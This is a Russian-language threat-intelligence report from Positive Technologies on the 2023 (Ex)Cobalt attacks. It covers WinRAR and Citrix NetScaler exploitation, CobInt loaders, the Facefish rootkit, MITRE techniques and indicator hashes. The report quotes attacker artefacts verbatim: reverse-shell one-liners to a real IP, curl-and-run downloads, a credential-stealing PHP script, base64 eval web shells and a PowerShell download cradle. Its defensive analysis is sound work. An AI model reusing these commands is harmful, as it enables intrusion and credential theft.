Positive Technologies
PT Expert Security Center

Уже не те: атаки (Ex)Cobalt на российские компании в 2023 году

Уже не те: атаки (Ex)Cobalt на российские компании в 2023 году

Содержание

Введение

Деятельность киберпреступной группы Cobalt отслеживается с 2016 года и направлена на атаки кредитно-финансовых организаций для кражи средств. Однако в последние несколько лет группа сместила акцент атак с банков и теперь больше похожа на группу, которая занимается кибершпионажем. Несмотря на отсутствие громких кампаний с 2020 года, нами в последние несколько лет регулярно фиксируются фишинговые рассылки вредоносных файлов, вложенных в архив, запуск которых приводит к загрузке модуля CobInt. Это ВПО является одним из основных инструментов группы, и ранее не фиксировалось использование этого инструмента другими группами.

Кроме фишинговых рассылок, вредоносные файлы использовались в ходе атак на российские компании в сферах энергетики, образования и телекоммуникаций, что было зафиксировано во время реагирования на инциденты информационной безопасности в 2023 году. Обнаруженные факты позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны.

В статье будут рассмотрены две цепочки атак с использованием актуальных уязвимостей CVE-2023-38831 и CVE-2023-3519, а также руткит Facefish, используемый для компрометации узлов под управлением ОС Linux.

Вектор № 1. Запрос от (Ex)Cobalt

В конце августа 2023 года специалистами экспертного центра безопасности Positive Technologies (PT Expert Security Center, PT ESC) был замечен тренд на использование уязвимости CVE-2023-38831 в программном обеспечении WinRAR.

Число вредоносных архивов
Рисунок 1. Число вредоносных архивов

Из общего потока наблюдаемых файлов нас заинтересовал архив ucx_2314_4_2_ot_28_08_2023.rar, содержащий файл-приманку в формате PDF и вредоносный исполняемый файл.

Содержимое архива
Рисунок 2. Содержимое архива

В файле-приманке описана продукция китайской корпорации авиационной промышленности, текст написан на русском языке, что позволяет считать последующую цепочку действий целенаправленной атакой.

Содержание файла-приманки
Рисунок 3. Содержание файла-приманки

Так как архив имеет измененную файловую структуру, при открытии PDF файла происходит запуск исполняемого PE-файла Zapros_2314_4_2_ot_28_08_2023.pdf .cmd, который представляет собой установщик на платформе Nullsoft Scriptable Install System (NSIS) и инициирует следующий этап атаки.

Общая схема атаки
Рисунок 4. Общая схема атаки

Кроме описанного выше сценария первичного доступа с использованием уязвимости был обнаружен архив Zapros_13-2-16442-upr_ot_25_08_2023.zip c файловым ярлыком, который извлекает из себя и запускает аналогичный исполняемый файл. Команда LNK-файла:

    
/v /c set g="%cd%\Zapros_13-2-16442-upr_ot_25_08_2023.lnk"&(if not exist "!g!" (for /f "tokens=*" %u in ('where /r "%localappdata%" Zapros_13-2-16442-upr_ot_25_08_2023.l?k') do set g=%u))&>nul set n=t&set f=e&set o=%temp%&certu!n!il -decode "!g!" !o!\fahsdiksfaem.!f!xe&start /b !o!\fahsdiksfaem

Интересным является факт, что в именах файлов-приманок используется одинаковая маска Zapros*.

Дроппер NSIS

NSIS-скрипт, выполняющий процесс установки, извлекает во временную папку следующие файлы:

  • файл-приманку (аналогичный PDF-файлу в архиве);
  • открытый PowerShell-скрипт декодирования;
  • шифрованный PowerShell-скрипт декодирования;
  • набор закодированных файлов (их предназначение описано далее).

Кроме того, этот скрипт вызывает команды плагина — динамически подключаемой библиотеки nnujshaigu.dll (imphash:9ffedcca1b5171b3fb3e4430638971c1).

NSIS-скрипт
Рисунок 5. NSIS-скрипт

Первым делом жертве демонстрируется ожидаемый PDF-файл (см. рис. 3). Следующей командой исполняется PowerShell-скрипт yplseoefri.txt декодирования кода из файла auspun.txt, который отвечает за получение ключа от управляющего сервера hxxps://wop[.]fsbkal[.]com/xseyyzpyy.txt и расшифровку второго скрипта декодирования алгоритмом AES в режиме CBC. Для образца, извлеченного из LNK-файла, ключ загружается с соседнего домена hxxps://zay[.]fsbkal[.]com/isicpjgki.txt.

Декодированный PowerShell-скрипт auspun.txt
Рисунок 6. Декодированный PowerShell-скрипт auspun.txt

На момент исследования файлы-ключи для загрузки с управляющих серверов не были доступны, поэтому «штатная» работа ВПО завершалась, так как следующие команды предполагают расшифровку файла gmzaofeioe.dat для декодирования им оставшихся файлов.

Зашифрованный файл имеет сопоставимый размер (26 Кб) с PowerShell-скриптом декодирования на первом этапе, а оставшиеся файлы ampifkinn.txt, tygnfg.txt, yapaaiu.txt имеют схожий внешний вид отформатированного псевдослучайного текста, что позволило предположить, что на обоих этапах используется одинаковый алгоритм, но разный словарь кодировки.

Пример кодированных файлов
Рисунок 7. Пример кодированных файлов

Алгоритм декодирования подразумевает следующие шаги:

  • исключение всех небуквенных символов;
  • приведение всех символов к нижнему регистру;
  • разбиение получившегося массива на пары — строки длиной 2 байта;
  • замена каждой пары одним символом ASCII.

Стоит отметить, что каждый ASCII-символ имеет строго три варианта сопоставления (например, символ «a» может быть получен из пар «se», «he», «am»). Таким образом, зная основные лексемы языка PowerShell, а также частоты встречаемости символов в этом языке, удалось восстановить словарь и декодировать оставшиеся три файла.

Кодированный и восстановленный PowerShell-скрипт (persistence) Кодированный и восстановленный PowerShell-скрипт (persistence)
Рисунок 8. Кодированный и восстановленный PowerShell-скрипт (persistence)

Следующим этапом происходит декодирование файла полезной нагрузки и VBS-скрипта запуска полезной нагрузки, а также закрепление в системе при помощи записи в ветку реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Run ключа letsintellsvc, маскируясь под легитимное ПО.

Кодированный и восстановленный VBS-скрипт запуска основной нагрузки Кодированный и восстановленный VBS-скрипт запуска основной нагрузки
Рисунок 9. Кодированный и восстановленный VBS-скрипт запуска основной нагрузки

VBS-скрипт деобфусцирует строку запуска файла основной нагрузки:

    
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "LetsIntell.ps1"

Файл полезной нагрузки

Полезная нагрузка представлена PowerShell-скриптом, который хранит в себе два шелл-кода под архитектуры x86 и x64, подготавливает память и передает на них управление по заданному смещению. Скрипты имеют характерную обфускацию строк и большое число функций, выполняющих конкатенацию строк. Скрипт детектируется рядом антивирусных средств с вердиктом PwShell.Carbanak.

Шелл-код отвечает за загрузку основного компонента CobInt с контрольного сервера с адресом hxxps://logilokforce[.]com/vooijfmoyehiaoii. Адрес контрольного сервера и URL-адрес зашифрованы алгоритмом XOR c 4-байтовым ключом.

На момент анализа файлов основная нагрузка с этого контрольного сервера была недоступна. Подобные скрипты с встроенным шелл-кодом мы наблюдали в течение продолжительного времени и ранее. В следующей таблице перечислены контрольные суммы аналогичных файлов и извлеченные из них адреса для скачивания основной нагрузки. Выделены URL-адреса, с которых удалось загрузить файл следующего этапа.

sha256 С2
9f575176df27a12499cd7ce5771a3b23cb52bbaa014914085fc67f6a17860280 https://onepostlive[.]com/anccdfhopcykoolqeyi
a165a69186b8a2b885dceb77256d11a21007538d47b72526ed72721bd857df00 https://knlrgb[.]com/edeuluuubyouxq
671d7358c2b0d2b1f2697c05b6f17ae40762462ad960ab53613503e8a2f48e78 https://avptp[.]com/teokqacxdsosauxpj
67a3d5872bf1ee18d7c4d6739f91537c6bc41651747ad0e4ade71e65d619ef9d https://winkb0172[.]com/tnoieeaiivowvbossidz
92b640dbb0c12c06d9073e1aa42648531dbb25a867243c378e1ff7a3c8c74c87 https://deadork[.]com/ytfyjuianoyveueuyasnzea
4b3c9372d1038bc8882d30a4d3813154a0e772ed66fe64207a9003502a9ffd3a https://winkb0172[.]com/izyhipdehabzzyearkdeog
a47500325210892e0a00ba1250648e7c0d991daaad34eacbee88dc2ffe275202 https://saakashvili.com[.]ua/vimtaolzobfldpoq
59658F5B44E7BD2B19161CA8A82B6F8B25CFDD222CB65EB6E575EE12FCDC6464 https://kavupdate[.]com/eaagzioiwa

Все полученные файлы являются экземплярами основного модуля CobInt, логика работы которых соответствует описанию в статье компании Proofpoint и в материале Group-IB.

Вектор № 2. The Green Mile

Осенью 2023 года команду PT CSIRT привлекли к реагированию на инцидент информационной безопасности в российской компании в сфере энергетики. В ходе реагирования экспертами было установлено, что в организации был скомпрометирован шлюз удаленного доступа к сети Citrix NetScaler Gateway версии 13.1.

Первоначальный доступ

Предположительно, злоумышленникам удалось получить доступ при помощи публично известной уязвимости CVE-2023-3519, опубликованной в июле 2023 года. Подробный разбор уязвимости исследователями Assetnote:

На момент анализа шлюза веб-журналы были ротированы, поэтому подтвердить эксплуатацию уязвимости через связанные с ней GET-запросы не удалось. Тем не менее в неразмеченном пространстве файловой системы удалось обнаружить характерные запросы /gwtest/formssso?event=start&target=, которые указывают на попытки эксплуатации уязвимости CVE-2023-3519.

Следы эксплуатации уязвимости в Citrix NetScaler Gateway
Рисунок 10. Следы эксплуатации уязвимости в Citrix NetScaler Gateway

В процессе анализа был выявлен ряд веб-шеллов в директории /var/netscaler/logon/. Записи появились в файловой системе 17.08.2023 и соответствовали логике шелл-кода из опубликованного proof of concept от 01.08.2023.

При анализе сервера был выявлен простой веб-шелл с именем ctxHeaderLogon.php и ключом JohnCoffey2023!, позволяющий удаленно исполнять команды на шлюзе.

Контент веб-шелла
Рисунок 11. Контент веб-шелла

Кроме того, был обнаружен скрипт netscaler.php, который перехватывает входящие POST-запросы, а после записывает полученные из URL-адреса учетные записи в файл netscaler.1. Таким образом злоумышленникам удалось похитить десятки учетных записей.

    
<?php $date = date("d/m/y : H:i :"); $username= $_POST['u']; $password= $_POST['p']; #$password2= $_POST['p2']; if ($username !="undefined"){ $username = urldecode($username); $password = urldecode($password); file_put_contents("netscaler.1","Username:".$username.PHP_EOL ,FILE_APPEND); file_put_contents("netscaler.1","Password:".$password.PHP_EOL ,FILE_APPEND); file_put_contents('netscaler.1', "Date:".$date.$data.PHP_EOL, FILE_APPEND); #file_put_contents("netscaler.1", "PIN:".$password2.PHP_EOL ,FILE_APPEND); file_put_contents("netscaler.1","------------------".PHP_EOL ,FILE_APPEND); } ?>

Пример скомпрометированной учетной записи из файла netscaler.1.

    
Username: [REDACTED] Password:QWerty2024 Date:11/09/23 : 05:59 : -----------------------------------------------------

Про аналогичную связку веб-шелла, скрипта перехвата учетных записей и эксплуатацию уязвимости CVE-2023-3519 писали исследователи из компании Huntress в материале от 26.09.2023. Других пересечений с атакой, описанной в отчете, и расследуемым инцидентом мы не обнаружили.

Для управления узлом атакующие за достаточно короткий промежуток времени пробовали использовать разные способы, в том числе telnet (reverse shell) и reverse_shell.py.

    
sh -c '(sleep 4325|telnet 51.15.18.85 4102|while : ; do sh && break; done 2>&1|telnet 51.15.18.85 4102 >/dev/null 2>&1 &)'

Запуск reverse_shell.py:

    
Sep 25 13:53:22 [REDACTED] sh_command="python3 rev4204.py " Sep 25 13:53:43 [REDACTED] sh_command="netstat -an | grep 51.15.18.85 "

Содержимое файла reverse_shell.py:

exec(__import__('zlib').decompress(__import__('base64').b64decode (__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrckmA3t0i7LYgURDyIiuN4WkTaZ1dI0CUlWq+J/tyGLlxnemzdvPobJWR9xsHKEyL/ 10PO+C7CpeYj+JCOPwwToaD2e8WCw78wb0KpkO1RE/7XEIrS5WeRE1/ yM948396/756fb6weWdEJaY0BGSklTiaoR1VZsG8LrdVmzpOg9dCMqYJbgYrJOs0XQAI42DOk2ryROxnVypOTqjvAgPMgPuhgcyhek2jPWDH2+ DxqwBkMVu9SLnbr4r64yzRDMIGm6WiiQdnIeQqD5AaLf1IlUkJT8hwSyC78M/QGFbV7K')[0]))) import socket,zlib,base64,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('51.15.18.85',4204)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)

Кроме того, злоумышленники запускали утилиту для туннелирования трафика Revsocks (Reverse socks5).

    
curl -O https://github.com/kost/revsocks/releases/download/v2.2/revsocks_freebsd_amd64 mv revsocks_freebsd_amd64 nsnetsvcs /netscaler/nsnetsvcs -connect 51.15.18.85:8844 -pass 123

ВПО Facefish

Кроме установленных веб-шеллов и программ туннелирования трафика атакующие предприняли попытку загрузки с управляющего сервера eu–debian[.]com и запуска дроппера Facefish с именем ssh3600. Об этом рутките ранее сообщали исследователи из компаний Juniper и Qihoo 360 Netlab.

    
Sep 25 13:47:15 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 ; ./ssh3600 ; rm -f ssh3600 " Sep 25 13:47:38 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 "

Образец является разделяемой библиотекой (shared object), которая работает в пользовательском режиме и внедряется в процесс SSHD через метод LD_PRELOAD. Его основное назначение — кража учетных данных SSH, а также удаленное управление зараженным узлом.

Адрес контрольного сервера
Рисунок 12. Адрес контрольного сервера

Специалисты PT ESC неоднократно обнаруживали руткит Facefish в ходе расследований инцидентов ИБ. Помимо описанных ранее версий, нам удалось обнаружить новую модификацию:

  1. В новой версии добавлен перехват функции getdelim, который, подменяя легитимный системный вызов с аналогичным именем, при чтении конфигурационного файла /etc/ssh/sshd_config добавляет в итоговый результат дополнительный порт, на котором сервис SSH принимает входящие подключения.
  2. Транспорт реализуется по протоколу HTTPS с использованием библиотеки BearSSL.
  3. В новой модификации перехватываются следующие SSH-функции:
    • user_key_allowed2;
    • sshpam_auth_passwd;
    • auth_shadow_pwexpired;
    • getpwnamallow;
    • login_write (новая функция);
    • read_passphrase;
    • ssh_userauth2;
    • key_perm_ok;
    • load_identity_file;
    • key_load_private_type (новая функция).

На рисунке ниже представлена временная схема обнаружения образцов ВПО Facefish, которые использовали в атаках на российские компании.

Хронология обнаружения образцов ВПО Facefish
Рисунок 13. Хронология обнаружения образцов ВПО Facefish

Далее был обнаружен метод закрепления через RC-скрипт на устройстве Citrix NetScaler Gateway, позволяющий выполнять вредоносную нагрузку при каждом перезапуске системы. Метод является легальным и описан в документации к шлюзу. Модифицированный злоумышленниками файл rc.netscaler представлен ниже.

    
cp /nsconfig/gettytab /etc /bin/sh /etc/ntpd_ctl full_start nsapimgr -ys skip_systemaccess_policyeval=0 nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0 echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out /netscaler/ns_gui/vpn/images/vpn_ns_gui.php echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php chmod 6555 /bin/sh chmod 6555 /bin/sh

Скрипт записывает содержимое веб-шеллов в файлы vpn_ns_gui.php и css.php, а также устанавливает бит SUID. Ранее этот метод закрепления описали исследователи из Eclypsium.

Общая схема атаки
Рисунок 14. Общая схема атаки

Продвижение по сети

После успешного закрепления на устройстве Citrix NetScaler Gateway и компрометации привилегированных учетных записей атакующим удалось добраться до сетевого сегмента с Windows хостами.

Для компрометации дополнительных учетных записей злоумышленники провели дамп процесса LSASS с помощью публично доступной утилиты NanoDump.

Для перемещения внутри периметра атакующие использовали фреймворк Impacket. Пример создания учетной записи и добавления ее в группу «Локальные администраторы» представлен ниже.

    
%COMSPEC% /Q /c echo net user SUPPORT_[REDACTED] [REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\fRRzcYNi.bat & %COMSPEC% /Q /c %SYSTEMROOT%\fRRzcYNi.bat & del %SYSTEMROOT%\fRRzcYNi.bat %COMSPEC% /Q /c echo net localgroup administrators SUPPORT_[REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\KhVMDxzc.bat & %COMSPEC% /Q /c %SYSTEMROOT%\KhVMDxzc.bat & del %SYSTEMROOT%\KhVMDxzc.bat

После добавления учетной записи в группу «Локальные администраторы» злоумышленники многократно пытались запустить обфусцированный PowerShell-скрипт с именем kavupdate.ps1, анализ которого показал, что он является скриптом PwShell.Carbanak. При успешном запуске PwShell.Carbanak скачивает бэкдор CobInt с управляющего сервера kavupdate[.]com и выполняет его в оперативной памяти.

Стоит обратить внимание, что злоумышленники пытаются маскировать свой инструментарий и сетевую инфраструктуру под инфраструктуру «Лаборатории Касперского».

    
%COMSPEC% /Q /c echo powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://ukr-net.website/kavupdate.ps1')) ^\u003e \\\\%COMPUTERNAME%\\C$\\__output 2^\u003e^\u00261 \u003e %SYSTEMROOT%\\VvMnbfaA.bat \u0026 %COMSPEC% /Q /c %SYSTEMROOT%\\VvMnbfaA.bat \u0026 del %SYSTEMROOT%\\VvMnbfaA.bat

PowerShell-скрипт и загрузка основного модуля CobInt совпадают с рассмотренной ранее цепочкой, что позволяет нам объединить атаки. Подобные скрипты регулярно фиксируются специалистами на протяжении нескольких лет. На рисунке 15 представлены имена файлов и связанные с ними контрольные серверы по времени их обнаружения.

Хронология PwShell.Carbanak
Рисунок 15. Хронология PwShell.Carbanak

Сетевая инфраструктура

Анализ WHOIS-записей контрольных серверов демонстрирует, что большинство фигурирующих в кампании доменов зарегистрированы в Киеве.

Примеры WHOIS-записей
Рисунок 16. Примеры WHOIS-записей
Домен C2 IP-адрес Информация из WHOIS-записи
fsbkal.com 172.67.205.75 Registrant country: Ukraine
knlrgb.com 23.132.185.120 Registrant country: Ukraine
avptp.com 185.117.73.169 Registrant country: Ukraine
deadork.com 176.105.252.116 Registrant country: Ukraine
saakashvili.com.ua 185.104.45.61 organization: Hosting Ukraine LLC
registrar: ua.ukraine
ukr-net.website - Registrant country: Ukraine

Кроме вышеперечисленных записей есть и другие управляющие серверы (смотри раздел «Сетевые индикаторы»), но единого критерия, позволяющего объединить все в одну группу и использовать для атрибуции, выделить не удалось.

Выводы

Рассмотренные в статье цепочки атак, а также вредоносные файлы, выявленные в ходе расследований в 2023 году в организациях сектора энергетики, образования и телекоммуникаций, позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны. Общее число проведенных расследований и обнаруженных файлов предполагает не менее десяти потенциальных жертв на территории России. В арсенале группы появился новый инструмент — руткит Facefish, который атакующие используют для заражения узлов под управлением ОС Linux. Для компрометации компаний группа продолжает использовать актуальные уязвимости CVE-2023-38831 и CVE-2023-3519. На момент исследований в российском интернете было обнаружено более 50 шлюзов Citrix NetScaler Gateway с версиями, подверженными уязвимости.

Авторы: Александр Григорян, Максим Похлебин
Positive Technologies Expert Security Center (PT ESC)

MITRE TTPs

ID Имя Описание

Initial Access

T1566.001 Phishing: Spearphishing Attachment Группа рассылала фишинговые письма с вредоносными вложениями
T1190 Exploit Public-Facing Application Злоумышленники использовали общедоступный эксплойт (CVE-2023-3519) для получения доступа к инфраструктуре

Execution

T1203 Exploitation for Client Execution Группа использовала уязвимость в ПО WinRar для запуска вредоносных компонентов
T1204.002 User Execution: Malicious File Группа рассылала письма с вредоносными архивами, содержащими LNK-файлы
T1059.001 Command and Scripting Interpreter: PowerShell Группа применяла PowerShell-скрипты для загрузки и запуска своих компонентов
T1059.005 Command and Scripting Interpreter: Visual Basic Группа применяла скрипты Visual Basic для запуска своих компонентов

Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Группа использовала ключи реестра (автозапуск) для закрепления в ОС
T1037.004 Boot or Logon Initialization Scripts: RC Scripts Группа использовала метод закрепления через синхронизацию времени на устройстве Citrix NetScaler Gateway, позволяющий выполнять вредоносную нагрузку при каждом перезапуске системы. Он описан в документации к шлюзу. Для эксплуатации этого метода злоумышленники модифицировали файл rc.netscaler
T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking Facefish инжектируется через метод LD_PRELOAD в процесс SSHD

Defense Evasion

T1027.010 Obfuscated Files or Information: Command Obfuscation Группа использовала обфускацию строк и команд на всех этапах работы ВПО
T1140 Deobfuscate/Decode Files or Information Группа использовала шифрование своих компонентов для их защиты от обнаружения и анализа

Credential Access

T1003.001 OS Credential Dumping: LSASS Memory Для компрометации дополнительных учетных записей злоумышленники выполнили дамп процесса LSASS публично доступной утилитой NanoDump
T1056.003 Input Capture: Web Portal Capture Группа использовала скрипт netscaler.php, который перехватывает входящие POST-запросы, а после записывает полученные из URL учетные записи в файл netscaler.1

Lateral Movement

TA0008 Remote Services: SMB/Windows Admin Shares Для перемещения внутри периметра атакующие использовали фреймворк Impacket

Command and Control

T1071.001 Application Layer Protocol: Web Protocols Группа использовала протокол HTTPS для взаимодействия с C2-сервером

IoC

Файловые индикаторы

sha256 sha1 md5

Файловые архивы

ucx_2314_4_2_ot_28_08_2023.rar

dc0b31112e40cf7a7e56e6efb30c0ddbfec25b04f91f040ea32b6a94da2f4ae1 ce12638fab2d8eec7629859c591b5c96f2187bd6 3f4f213fe0a4d3de51400c5914865c2d

Zapros_13-2-16442-upr_ot_25_08_2023.zip

723a1240e7042c87e3ca749335d9d525da566eccc0113cd5fecb92e6cc2a4552 36f05bc39cac762fc2afd1e8444efb35f78dc97e f84e409b4ca80e349a19fa7555177379

Запрос.rar

7a00788861387277ac5d425d337081f04815b8e138fc907525298e4a753a5d12 eb7a70ccfac55f1a84b2780781efa29659b2d0ba ba1f2bfe95b219354ddad04b79579346

Вопросы.rar

4734872c96538ac93dadb763c4a1b949451b4bb85499130344f296ede1363602 8c19486477e311033cde902256aca218fdb580b0 3cfc9972ad7cbd13cac51aade3f2b501

Doc.rar

db12ab5d30afb28053390cdb363d7acadf78a05df0e758e6de9cbdfbbb2ec691 0b3d99d4a41a242887f2e8da6f5e6ddb05040a6b c2ef9f814fc99670572ee76ba06d24da

Doc.rar

54f6476db646aa49076f9951d4b66573f16b005abe02cc19bc9f3b43ba7a2d63 6bbdc557d2c83dda50a9397a2326397d0b78f93c 3751b3326f3963794d3835dbf65ac048

исх. 01-43-527 от 13.11.2020.rar

f7e43e945f850d9e46e9ec8f1c12c92c25f5a58fb77289a5a773925acf33253c c182f5d3870d2e2672e2852964652fd7264cff03 56be65fe4d9709c10cae511d53d92d1a

Файловые ярлыки

Zapros_13-2-16442-upr_ot_25_08_2023.lnk

ec825d1321ad1d2f819c83301c5ff1970192d45b017a53177507f5e7716bceb8 d90e2acca4af042fe8a76f428af6ca742224409d 0da63b385b2b6650dd6acf3b511e5ac8

Предварительный список вопросов нашего интервью для согласования_jpg.lnk

b9a9acfc4748a50ada048af2fa6bc9516da89e36e94e10f96effbcb167faa76d a1088a23c4893d5c31fa92c11463904e63bc9bbe bc740d642893e0fe23c75264ca7c2bca

Исх.№1487 от 28.05.2021г Scan_Document_112247_jpg.lnk

d7f56c043e7ca8592c71b691d27f74bd0e3ab95e302ecb8f70042b2dbf3d6938 b90959a1f08fb2246ed31edbc9097fb4b9873c78 d5628fe5de110e321110bbc76061702b

Scan_Document_2021_1702679.lnk

c4afe812d6b2354e27075e85efcd422dbdd0ea7a93a68fd562df41ce842a4f6a d0c08ca2e85cc593e0070365d81f1590587c2210 b25865010562a3863ef892311644b3bb

Scan_Document_2021_1702679.lnk

076861523bd5954677ea4ab97905c3c81695e3597dd14d2ebab3259faa354433 323343dafd5bad9b2efdd9f1b5e0540ca1d7b8ae bdcb83cc6f54d571a2c102fbbd8083c7

Письмо исх. 01-43-527 от 13.11.2020.lnk

432d39c43236a1fdf5275904d7d76affd8053c494fc230b28c63d8a23bdbe637 adbcf3571ecd5a59cd7823a7dee0963790960b37 53ee0babcf03b17e02e4317b6a410b93

NSIS-установщики

Zapros_2314_4_2_ot_28_08_2023.pdf .cmd

44823ab8285aeba075afae39c95b520ded2f4a1c85bbe3aa1e30ff1901219524 b6fa1fa8b47813ee67273a9873369c6b20e1570f efef98a7f440599c3ce6771cd24eb823

fahsdiksfaem.exe

bab354aa68a6f42746454d560c780cacc2a8c0de62da2c3ee3d13bec147e777a 413a1b9c0042a5e54646c153ee0eaf44e2e35217 2762cdb6dc0f970e40fb3f67c391dde6

Windows_photo_viewers.exe

023cb80b7ce8821726a80244f5ff4c22d9fd02245a99ad4a234c87befed6250b 9fd37f603fea46ba14b8dd697d468cbf7c846eb3 fc71981649d18468e416e327f6d2c523
3bdc05315efbfe59c6ce8a3a82495986677a4c7729f4cb6bb95335b4edb6cc2a e0098470c988926128c59daa91a0c269ee040e67 78e6e317c689deecec2acb0fe04a2cd8
d0d736da2f65ac496ceeba4b5e672bda72ff57f0cd82da2a9792a852e72dee0a ada5cd8277a778c8c014f189c8c271ed7b4afd97 c77156623eeec2c7ac75e0eb3ff357cb

PwShell.Carbanak

ServMsctl.ps1

9f575176df27a12499cd7ce5771a3b23cb52bbaa014914085fc67f6a17860280 ade7c84a8baf672c5fcf9e5afa5ad99cca38c8bf 498c80bbf56f34bb0c0e235221c27d33

NotificationUx1s7c2a76.ps1

a165a69186b8a2b885dceb77256d11a21007538d47b72526ed72721bd857df00 9ee4203e7149879095e0600bc09570478b20a73b 18ffdd86198bae2e64e1a8997803203f

AC-Bot-x64.ps1

671d7358c2b0d2b1f2697c05b6f17ae40762462ad960ab53613503e8a2f48e78 ca915b1de20306a91578ba38073d1657cb442697 6e78c9b597e2b12cc349c72d44a61a36

ProgramData-CanonGG-CanonGG.ps1

67a3d5872bf1ee18d7c4d6739f91537c6bc41651747ad0e4ade71e65d619ef9d e967d45e8d57622dda7bd3b6c022e19170f37103 9fd7559fc4484e71436c0b00863a1941

IntellMcv.ps1

92b640dbb0c12c06d9073e1aa42648531dbb25a867243c378e1ff7a3c8c74c87 5c2e161ba31dee3bd339b3a86d128f6311876750 dbe7a9f61c7bf17c05de72222dbff24c

Load.ps1

4b3c9372d1038bc8882d30a4d3813154a0e772ed66fe64207a9003502a9ffd3a 04452e5404ef0499b78368b73b8b6bcee71d9802 3c3557483f7374976148bddc39421d3b

Intell.ps1

a47500325210892e0a00ba1250648e7c0d991daaad34eacbee88dc2ffe275202 d1ca6b93fd9ee04a14dac2d5b6428ae29e419c1e 370b1687f7a5d416a34cc5d86a8a551c

DaTTxz_dgs2_ok.ps1

4dc7ad582d93d931d5ab04caa4b6884e3f1b1219c2ddced9452ce82104a3f846 0baf24abbede1f31dabd5c8efe307699fbcbcbe5 1430adfd7682e6aba17af48089d39a8b

van.ps1

5a7790fb194984823acbc398496ab9ccda5815e1ed3c857c00b9ce7989414c3f 8372663284df144bc1ea50502143a7cedfc43238 7cc9d3dd9bdbad7518f2b6ed84d72c3c

BD95A8CD.ps1

11994c859fa3674634b1d79a5d20f3aeee0d06285287c2d3abc6339915bf8a3c d8e2070449ddbb3a5f42f889599f101e5a757084 abe4f09b23b961aa9a8a44da285c3f14

Drvstdc.ps1

bbc359c681f2e35ca6d22c8a391154168610927bb0af3c2e5c74117f96a9c174 eee664e586e9e0085a3dda5718cdf650d0760132 3846c367d121e3256c97b9d1c0cbde8a

Drvstd.ps1

c5b072170c03c63bb4b8c5bb2688fa27eccd3789947b0fa9d3b68fd829f24d2c 384ec6b22141a45ec5a36fa7dc4f7e7cda43513a 455527a3a2abcb9cdea1480fed0e34c8

Drvst.ps1

dae8f5dbf156f32cecf0f2570346784aa96d50cbe9f5c71e21b15ddb8e3795f6 234de71aca98969274287d3e37f81f346c831833 83ffd3cec3044fdaf3ef573a72fa6df8

AC-Bot-x64.ps1

86567d7de9c61880fb0f7fc5445c1f3e2d6c528522477acb445c7f57e5c0dd94 f7f56e90b796fa0682fe20a28016a664e78a46ab 370d4396691305e5d8bc592e237a07aa

CanonIJEGS.ps1

9f781e520e5d8eb2f54ce6a5892ce49f2ba81e340962b0bef2fd13f87209a742 25cc79ecdc8686561283460b6d5ff85279677be6 41bda88a385e2ebac59dead51c5ed159

IntellDev.ps1

cfc47daaf190d5cea9c406f8c33fd2ef91fc4e17d7ebcd3a4501a5a7d95151f9 3dc0ee79bc679392a9269f5b44853c845917fd80 1d329686ce1a93e802f0f94d67a88bc9

Intelltec.ps1

6b60591bdc52884633684085726b23c0f689459041f9e35e97b958160a108e95 070438edc6047450beb5a54a518429c576de3459 a5067dff82127ff87790e3538deb5505
75b1eb0405a2b18a5d4ceb1a68c2582e9e78beaf83b1819f555f1ec559ed994c 626be2b17c72ef9649335f51dbe18eaa073675e6 5fed0e4d66f95175f2107a05f66a28a8

kavupdate.ps1

893f5a6edd7051c6d0f7531103827bfd3e462b794801967c6293f9c62dcda409 2ce0dd7142defd579e1d9e1926874eadab29e83e 09481b8b10553b1d6c74ae5977342d81

Pack1632.ps1

0fbe88cd1f9cdebdd2e2dfec49fbd8d1f73f87cff366597b0868630e73e25f2b 12de41e5004587cbc8fc8b8b2e2ef0226cfe05b9 bdb5b304d9ad5afc9d1c08d018541df0

Pack1686Dv.ps1

83658aaeccd0fb3f027a8925abfb2c4f26e6881bc0c9ae774f6f35fe11b6804e 6ea393d1246b7dab0e951d10d422e7cf9c4e7391 b84d55ee1c8c82588897f6278712e3c4

IntellDev.vbs

e3c861e03f6e3b0cfb77e3874828059a7376c8008a669f8730f7515477559f35 60510e37613d6e8e0d43382c48a8f73959f8229e 5e6b61f78787a31ffcc4d6f93e0a0d01

IntellDev.txt

796c112d6b1ccc5d1a686f509f4d808c4f072ae46f5ef68c5abf8f53c4ce24ed c025d5680e9855540c87f3175353325ff1ef0ed3 eed3f9b5f271c55c8918ab8c524b558a

Pack1686Dv.vbs

f4fe85729cd00484c5569801830fe38320f61ca551109b818935e3ac074ad371 306400c19b1cea992a4cc1fe11fd66cb5234ddf5 b50223e111c604c9392cc6d98ff60abc

ServMsctl.vbs

a5a7f21d4e76fed18c662084d062005b6c66f3b726e3687eb1d56134093bd392 1506c17b44a4a17d173ff60ae5c263e2f17d2895 37c42a6c127d884e84fcf155fed35a1a

ServMsctl.txt

f6490e99fc157686a6328589735acd06c6a244ffb130c610c1b5d48c5a64c209 7300d55f76923a9318040f8bd6287efccc9d2023 6b57a835ec00d1805da5b912c720c0a3

Intelltec.exe

